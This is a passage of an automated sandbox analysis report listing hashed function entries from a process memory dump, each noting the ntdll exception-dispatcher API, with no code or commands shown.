Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a65f336d8b0f6733a90282d9abb9f4ab5a6b1512f252b46803ed8704c6e4a82
Instruction ID: 74f8ff803db577d58abe5473412506e472257989c318474e9792b52f41141e4a
Opcode Fuzzy Hash: 6a65f336d8b0f6733a90282d9abb9f4ab5a6b1512f252b46803ed8704c6e4a82
Instruction Fuzzy Hash: EBC1D174E00218CFDB14DFA5C994B9DBBB2BF89304F6090AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E6838 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E6903

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7335a13acc2e208cab561582ff833dc95693dd98ac32a7245ed3f555e8902dbd
Instruction ID: e7c6e38978bf93b9f0452bc21ee4ecfb349a305e296778c66b9c46f2c79d92df
Opcode Fuzzy Hash: 7335a13acc2e208cab561582ff833dc95693dd98ac32a7245ed3f555e8902dbd
Instruction Fuzzy Hash: 21C1C174E00218CFDB14DFA5C994B9DBBB2BF89304F6090AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E5B30 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E5BFB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d6a5e9de99ed1669d1931fd6082b4a6f8bba8befa92fe69947b180c57deb6947
Instruction ID: ef43782569d9aede170eda980e0fd342af06bf07edeccf4614aa9179807a5abf
Opcode Fuzzy Hash: d6a5e9de99ed1669d1931fd6082b4a6f8bba8befa92fe69947b180c57deb6947
Instruction Fuzzy Hash: 9AC1C274E10218CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E1600 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E16CB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 75fc622ed238030e30796b505e173126d82ba9f92fa645ac056f0bb432517411
Instruction ID: a2e56b75fa3b96630b6484ab45ffc5fde4c045a546b374b6a893c1019a7366d7
Opcode Fuzzy Hash: 75fc622ed238030e30796b505e173126d82ba9f92fa645ac056f0bb432517411
Instruction Fuzzy Hash: C0C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E7E18 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E7EE3

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fdfdebef8b3b54f20c63cc775ede2be39ea2f3c5bf3dd8a0090ae46075817f3b
Instruction ID: 9f15ce28088926458d7680385ee2379cc3db93ee39bebbee2e8048fec918f9b3
Opcode Fuzzy Hash: fdfdebef8b3b54f20c63cc775ede2be39ea2f3c5bf3dd8a0090ae46075817f3b
Instruction Fuzzy Hash: 3EC1D474E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E7110 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E71DC

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0188de95ebdca33096a47c89325fcc1faf86dade1f9e7b8894c65b209794bfbc
Instruction ID: a312fc1649f3a7ef21de251ac2dea45a76efe3368c034883a47b2814d4f36321
Opcode Fuzzy Hash: 0188de95ebdca33096a47c89325fcc1faf86dade1f9e7b8894c65b209794bfbc
Instruction Fuzzy Hash: 92C1E474E04218CFDB14DFA5C994B9DBBB2BF89304F6090AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002E7568 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E7633

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c9d01db357eb3453c48ecee7c71c558959c68d46ee93f9cd78e75718e59baacd
Instruction ID: 1fc481a1b8885ee4b7089e2ab4bb9420779de6f824f29fd366b48e986fd8c30f
Opcode Fuzzy Hash: c9d01db357eb3453c48ecee7c71c558959c68d46ee93f9cd78e75718e59baacd
Instruction Fuzzy Hash: 0FC1C174E04218CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E8F78 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E9043

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9954078044a100790fdd8e1ee991794edaf0b1abfe33b9f063c79bc87b51751d
Instruction ID: 49e96c116445f10405a1a0d4cd635facd101c05e92688164e56fa58aa4134737
Opcode Fuzzy Hash: 9954078044a100790fdd8e1ee991794edaf0b1abfe33b9f063c79bc87b51751d
Instruction Fuzzy Hash: BEC1C174E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E8270 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E833B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4f56efc0406a8daac42d4240efbd6fbe91c278022558ce0afd177e6320d4423c
Instruction ID: 77de65fadd1c670a4b0f6a544bea8f5a2b192761030cd382958ff48b76c6deae
Opcode Fuzzy Hash: 4f56efc0406a8daac42d4240efbd6fbe91c278022558ce0afd177e6320d4423c
Instruction Fuzzy Hash: 25C1D174E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E0048 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E0113

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8a33b4c39b000cc61da11bf0be37f473eac191b9a35fb3a9c4162f61699eb74f
Instruction ID: 08655ed1fb9d2e2bd83b158f967c7c3191557d8e84689d1445b594ebd8754683
Opcode Fuzzy Hash: 8a33b4c39b000cc61da11bf0be37f473eac191b9a35fb3a9c4162f61699eb74f
Instruction Fuzzy Hash: 22C1D274E00218CFDB14DFA5C994B9DBBB2BF89304F6080AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E5258 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E5323

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cc5763ce9637d9ba93194c5d9584f6e5c6a03018fdd9c562feacf7fbe9b1afbd
Instruction ID: 53a0e045e4e83af393e724277416c73e039fa0db7a375bb6ae6f99b8d275d525
Opcode Fuzzy Hash: cc5763ce9637d9ba93194c5d9584f6e5c6a03018fdd9c562feacf7fbe9b1afbd
Instruction Fuzzy Hash: BDC1D174E10218CFDB14DFA5C994B9DBBB2BF89305F6080AAD409AB359DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002E1A58 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E1B23

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 77ab25cba7a2139d2ad3df446a8dae18247df67877c618534f0229f7e59dfee2
Instruction ID: 52e437b9736896719f11d605af4889fac8b7b5c8c79009ca1a07e70ba4f4d95c
Opcode Fuzzy Hash: 77ab25cba7a2139d2ad3df446a8dae18247df67877c618534f0229f7e59dfee2
Instruction Fuzzy Hash: D5C1D374E00258CFDB14DFA5C994B9DBBB2BF89304F2480AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E0D50 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E0E1B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d279e3d4580d049702522a9fc3e15d9b024a7e6abe21c51a8f7feb832bfe79a3
Instruction ID: 224804a5d4b6ae611a1fc684de16d82d0a0cd0311898ba8b101390adf4ac099e
Opcode Fuzzy Hash: d279e3d4580d049702522a9fc3e15d9b024a7e6abe21c51a8f7feb832bfe79a3
Instruction Fuzzy Hash: EEC1C274E00218CFDB14DFA5C994B9DBBB2BF89304F6480AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E11A8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E1273

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 975da2b758f91796b9e7d6e95737986e6e6c244033cd15e7a27426991cb21db1
Instruction ID: da6125aa65756634554432d88876e82483d86aa4ca74373a2430f8f6349aac73
Opcode Fuzzy Hash: 975da2b758f91796b9e7d6e95737986e6e6c244033cd15e7a27426991cb21db1
Instruction Fuzzy Hash: B3C1C274E00258CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E04A0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E056B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 481a973e581fcde4598248293ed22f8dd608581df0a9bdb6e31efbb1b195e669
Instruction ID: 53ddbc764cd70a992fefe7d647ac9c73c05bcf4d50500210b9e99e417258abf4
Opcode Fuzzy Hash: 481a973e581fcde4598248293ed22f8dd608581df0a9bdb6e31efbb1b195e669
Instruction Fuzzy Hash: 32C1C174E01218CFDB14DFA5C994B9DBBB2BF89304F6080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E5F88 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E6053

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 934ab77d2432d8b0a86bf9d9b01356932e34b946a078679aaae3352536b8e1ea
Instruction ID: 8dcecdbbe57ea9145b543d1b34413613325c953e9c896c361fb56f7b65bd319c
Opcode Fuzzy Hash: 934ab77d2432d8b0a86bf9d9b01356932e34b946a078679aaae3352536b8e1ea
Instruction Fuzzy Hash: C4C1C274E00218CFDB14DFA5C994B9DBBB2BF89305F2080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E6C90 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E6D5B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5efd34990233d46aa03a68fc9a9e71419115948f54ea498f64b90be8435e8d29
Instruction ID: 647ce61737fa3eb3a729e54f17ce6f4c02563e158669060b0fc53f21792320b2
Opcode Fuzzy Hash: 5efd34990233d46aa03a68fc9a9e71419115948f54ea498f64b90be8435e8d29
Instruction Fuzzy Hash: 9CC1D274E04218CFDB14DFA5C994B9DBBB2BF89304F2080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E63E0 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E64AB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2bf3064e869ff8be13a7b610eb2b740de2a9ec99120cac671b380bf1039057e0
Instruction ID: c965a0e7b1005d2af8ac3a9a59efc9b59909294caf5664645df218cb723af37a
Opcode Fuzzy Hash: 2bf3064e869ff8be13a7b610eb2b740de2a9ec99120cac671b380bf1039057e0
Instruction Fuzzy Hash: 4AC1C174E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E08F8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E09C3

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c8d1a265542049c5e320b6d5421f803e347e2f29f8b1c6f4e457540a0ef7b0a4
Instruction ID: f714baf23f00e0a5e624e040da1cca3b0d45ca6b173d4ab8dbf4181de4002734
Opcode Fuzzy Hash: c8d1a265542049c5e320b6d5421f803e347e2f29f8b1c6f4e457540a0ef7b0a4
Instruction Fuzzy Hash: 7BC1D274E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD409AB359DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002E86C8 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E8793

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ff200cadea1ac2654f95cb5faa0b9b0da46cfd2c688ca6dc9bea65140a46404e
Instruction ID: e7fca1abfe93fe56f0ea885b27efe254ebd648aa8989d6ebbaf552a10d0342a9
Opcode Fuzzy Hash: ff200cadea1ac2654f95cb5faa0b9b0da46cfd2c688ca6dc9bea65140a46404e
Instruction Fuzzy Hash: 36C1D374E14218CFDB14DFA5C994BADBBB2BF89304F2080AAD409AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E79C0 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E7A8B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ca19b3865f0c9a0436f4c6695af1c38d66d62827b33519bf91f39f687de27037
Instruction ID: 34a32965ef6626444bb975dd7089ced3aca06f4013976bf1d2850fab3e983692
Opcode Fuzzy Hash: ca19b3865f0c9a0436f4c6695af1c38d66d62827b33519bf91f39f687de27037
Instruction Fuzzy Hash: A7C1D174E04218CFDB14DFA5C994B9DBBB2BF89304F2090AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E56D8 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E57A3

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 675bad392f8a96181c1b3de3049740ded38c54a07a9eef96c0f9055b17e9ebaf
Instruction ID: 27d23eac9b5440f54e7cadeb87e28fd8d87d593312ebabd161e4ba39b1965a86
Opcode Fuzzy Hash: 675bad392f8a96181c1b3de3049740ded38c54a07a9eef96c0f9055b17e9ebaf
Instruction Fuzzy Hash: 13C1D074E10218CFDB14DFA5C994B9DBBB2BF89304F2080AAD409AB359DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E0012 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E0113

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e9af03a5a673eb98499ca3c916ee564328f2fe4c02b0c00467449599cf2846b2
Instruction ID: 75c7816fb04a51548f7db7181e34139d42e0e2144be5174e9895bb8c20f6569d
Opcode Fuzzy Hash: e9af03a5a673eb98499ca3c916ee564328f2fe4c02b0c00467449599cf2846b2
Instruction Fuzzy Hash: CA4149B0E04248CFEB04CFAAD8517DEBBF2AF99300F64C06AC414AB266DB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E5B20 Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E5BFB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b39450432916ace0e24e834d8ad885ef80cf90faacf774ab329e0b1467b024b5
Instruction ID: 564690396acd0b32cc5e04e2705429311f3d9b4121da2d7072fcfc115d08b22e
Opcode Fuzzy Hash: b39450432916ace0e24e834d8ad885ef80cf90faacf774ab329e0b1467b024b5
Instruction Fuzzy Hash: 2B410470E11648CFEB18DFAAC4416DEBBB2AF99304F64D12AD414BB269DB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E6828 Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E6903

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8117d43ed359aafc5411d90777f1b67ce2e61fad2698c1a936ed3123c180f8aa
Instruction ID: 5000355d841adcdbb581d5d959b675a47b4f4bb7be0158e931066d900218a518
Opcode Fuzzy Hash: 8117d43ed359aafc5411d90777f1b67ce2e61fad2698c1a936ed3123c180f8aa
Instruction Fuzzy Hash: 08412570E00248CFDB18DFAAC9556EEBBF2AF98304F24D12AD414BB269DB344946CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002E8260 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E833B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8cf8f5ad9c9be944420b8737c5b50b4f6fcee74cc1bce2db79f06c26c195fc88
Instruction ID: 97abc3424e1e62d2e367da8f4cc0278a7d88f318c2c76166bf5fc7674e6caf60
Opcode Fuzzy Hash: 8cf8f5ad9c9be944420b8737c5b50b4f6fcee74cc1bce2db79f06c26c195fc88
Instruction Fuzzy Hash: F541E570E00248CFDB18DFAAC9946DEBBF2AF99304F24D12AD418AB365DB354946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E5F78 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E6053

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 067aa53c783c337ed970c91ef3393853caee30a98467010690474e658aad9ef1
Instruction ID: 6f2286b34b1d5520d78f136c62567d1bbfa7076151093dfdceba29627dc38e1e
Opcode Fuzzy Hash: 067aa53c783c337ed970c91ef3393853caee30a98467010690474e658aad9ef1
Instruction Fuzzy Hash: FC410374E002488FEB18DFAAC9456EEBBF2AF98304F24C12AD414BB369DB345945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E7558 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E7633

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8d120f057dd151377fdd58286c086d4f123ba61b8ce965e7d48e8541e2df14f4
Instruction ID: e789ee5694538995eaa8f456db774e50bd97f052c24da3e12cd049fcf5173636
Opcode Fuzzy Hash: 8d120f057dd151377fdd58286c086d4f123ba61b8ce965e7d48e8541e2df14f4
Instruction Fuzzy Hash: CD41F670D04248CBDB18DFAAC8556DEBBF2AF89304F24C16AD414BB259DB344946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E79B1 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E7A8B

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9bb8a655e3553f89988602b1c22ba879af148b47970f87b28184ecace551c074
Instruction ID: 3546a40ec8e9fc46b67e57b1834c9bc2c36dcd31d3ac8a3540edd4ba45b6985e
Opcode Fuzzy Hash: 9bb8a655e3553f89988602b1c22ba879af148b47970f87b28184ecace551c074
Instruction Fuzzy Hash: 0141F270E04248CFDB18DFAAC9546EEBBF2AF89304F24C12AD419AB369DB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E63D1 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E64AB

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d99172b965f589fa2429ca06ea38c61930dc9afbea6333f1c87c81f19d340f2e
Instruction ID: 573a80595901283cb143a40f81c4a16f66880dce59fbba4f07d58f5d68627c87
Opcode Fuzzy Hash: d99172b965f589fa2429ca06ea38c61930dc9afbea6333f1c87c81f19d340f2e
Instruction Fuzzy Hash: 0741E270E002488BEB18DFAAC8556EEFBF2AF99304F24D12AD414AB269DB344945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 002E86B8 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E8793

Memory Dump Source

Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9d12cfd906a096530d98f5e7ac65501accd4e4be7931eb67a34663a07cfe47ea
Instruction ID: c171327b88f2f8a272e3e01274d87458f61b6fff4ce9a013cd816f291d4c1ff5
Opcode Fuzzy Hash: 9d12cfd906a096530d98f5e7ac65501accd4e4be7931eb67a34663a07cfe47ea
